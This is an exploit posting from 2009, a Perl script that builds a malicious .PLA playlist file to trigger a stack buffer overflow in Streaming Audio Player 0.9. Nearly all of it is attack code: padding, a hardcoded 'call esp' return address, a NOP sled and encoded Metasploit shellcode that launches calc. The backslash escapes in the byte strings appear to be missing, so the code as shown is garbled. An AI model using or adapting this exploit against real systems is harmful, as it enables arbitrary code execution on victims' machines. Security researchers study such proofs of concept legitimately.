sorinarasap09-overflow.txt
Posted on 08 May 2009
# by : Hakxer -> EgY Coders Team # Streaming Audio Player 0.9 (.PLA File) Local Stack Overflow Exploit # hakxer.1@gmail.com # Greetz : Allah # , ExH , ProViDoR , Error Code , Br1ght D@rk , all my friends ########################################################################## $buff="x41" x 288; $ret="x77xE9xAEx59"; # 0x77E9AE59 call esp $nops="x90" x 20; # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com $shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49". "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36". "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34". "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41". "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34". "x42x30x42x30x42x50x4bx48x45x44x4ex43x4bx48x4ex37". "x45x50x4ax47x41x50x4fx4ex4bx48x4fx44x4ax31x4bx38". "x4fx55x42x32x41x50x4bx4ex49x44x4bx58x46x43x4bx48". "x41x30x50x4ex41x53x42x4cx49x59x4ex4ax46x48x42x4c". "x46x47x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e". "x46x4fx4bx43x46x45x46x42x46x50x45x37x45x4ex4bx38". "x4fx55x46x52x41x30x4bx4ex48x56x4bx38x4ex30x4bx34". "x4bx58x4fx35x4ex51x41x50x4bx4ex4bx58x4ex41x4bx58". "x41x50x4bx4ex49x48x4ex55x46x32x46x50x43x4cx41x43". "x42x4cx46x46x4bx58x42x54x42x53x45x38x42x4cx4ax37". "x4ex50x4bx38x42x44x4ex50x4bx58x42x47x4ex31x4dx4a". "x4bx58x4ax56x4ax30x4bx4ex49x50x4bx48x42x58x42x4b". "x42x50x42x30x42x50x4bx38x4ax46x4ex43x4fx55x41x53". "x48x4fx42x36x48x35x49x38x4ax4fx43x48x42x4cx4bx47". "x42x35x4ax36x42x4fx4cx48x46x50x4fx55x4ax56x4ax39". "x50x4fx4cx38x50x30x47x55x4fx4fx47x4ex43x36x41x56". "x4ex36x43x56x42x50x5a"; open(MYFILE,'>>exploit.pla'); print MYFILE $buff; print MYFILE $ret; print MYFILE $nops; print MYFILE $shellcode; close(MYFILE);
